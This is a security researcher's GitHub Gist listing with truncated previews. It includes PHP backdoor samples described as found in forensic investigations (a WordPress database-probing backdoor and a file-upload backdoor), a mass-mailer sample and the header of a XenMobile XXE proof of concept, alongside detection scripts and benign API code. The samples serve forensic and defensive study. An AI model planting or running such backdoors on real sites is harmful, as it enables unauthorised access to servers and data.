Jonas Lejon jonaslejon

@jonaslejon
jonaslejon / t44.php
Created September 25, 2015 12:06
WordPress backdoor user. Found during forensic investigation
<?php
error_reporting(0);
if(isset($_GET['check']))
{
echo "pawet";
}
if(isset($_REQUEST["v1"]))
{
$link = mysql_connect($_REQUEST["v1"], $_REQUEST["v2"], $_REQUEST["v3"]);
$query = "SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema NOT IN ( 'information_schema', 'performance_schema', 'mysql' )";
@jonaslejon
jonaslejon / PHP-cookie-backdoor.php
Last active February 27, 2023 05:10
This is a PHP COOKIE backdoor that was found during a forensic investigation
@jonaslejon
jonaslejon / custom.list.chroot
Last active February 21, 2023 14:13
My custom Kali Linux package list for building the live ISO
python-usb
python3-usb
mingw-w64
isc-dhcp-server
bridge-utils
libdbus-1-dev
libdbus-glib-1-dev
python3-venv
dirbuster
cmake
@jonaslejon
jonaslejon / php-mass-mailer.php
Created March 17, 2015 09:01
PHP Mass Mailer
<?php
/*
The code below was found during a forensic investigation. It seems to be a mass mailer that is using the PHPMailer class to send mail
from compromised web hosting providers.
The "password" is 5307c392-ad5e-4909-adec-c9fd12572686, see below.
Investigation was made by Jonas Lejon <jonas.githubgist at- triop.se>
The signature for PHP.Trojan.Mailer-1 can only find the packed version of this file.
@jonaslejon
jonaslejon / file-upload.php
Created February 10, 2016 20:19
PHP file upload backdoor
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
@jonaslejon
jonaslejon / find.sh
Created November 3, 2021 07:14
Find Trojan Source unicode characters (CVE-2021-42694 and CVE-2021-42574)
#!/bin/sh
# Usage instructions: sh find.sh php|tr '\n' '; '
# Prints one find/grep command per bidi control character; copy and paste the output and execute it
ext=$1
# Unicode bidirectional control characters abused by Trojan Source (LRM, RLM, LRE, RLE, PDF, LRO, RLO, LRI, RLI, FSI, PDI)
C="\u200E \u200F \u202A \u202B \u202C \u202D \u202E \u2066 \u2067 \u2068 \u2069"
for a in $C; do echo find . -type f -name \"*.$ext\" -exec grep -H \$\'$a\' {} \\\; ; done
@jonaslejon
jonaslejon / postnord.txt
Created March 7, 2022 18:11
.com domains starting with postnord
$ zgrep ^postnord 2022-02-07-com.zone.gz|awk '{print $1}'|sort -u
postnord-22.com.
postnord-delivery.com.
postnord-dk-post.com.
postnord-dk.com.
postnord-epostal.com.
postnord-logistics.com.
postnord-nestle.com.
postnord-no.com.
postnord-norway.com.
@jonaslejon
jonaslejon / wpsec.php
Created February 24, 2022 18:31
WPSec.com PHP API
<?php
// Fetches a temporary access_token Bearer
// Replace the client_secret and client_id below
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_URL => 'https://api.wpsec.com/oauth/token',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_ENCODING => '',
@jonaslejon
jonaslejon / xenxxe.py
Last active September 9, 2021 06:07
Citrix XenMobile XXE Exploit
#!/usr/bin/python3
##
## PoC test for the XXE security vulnerability CVE-2018-10653 in XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28 <jonas.xenmobile@triop.se> https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##
import requests
import sys
@jonaslejon
jonaslejon / Mailgun PHP API with curl
Last active July 31, 2021 21:29
Send mail with Mailgun API version 2 and PHP. Should also work with version 3 of the Mailgun API
define("DOMAIN", "test.se");
define("MAILGUN_API", "XXX123"); // Mailgun Private API Key
function br2nl($string) {
return preg_replace('/\<br(\s*)?\/?\>/i', "\n", $string);
}
function mg_send($to, $subject, $message) {
$ch = curl_init();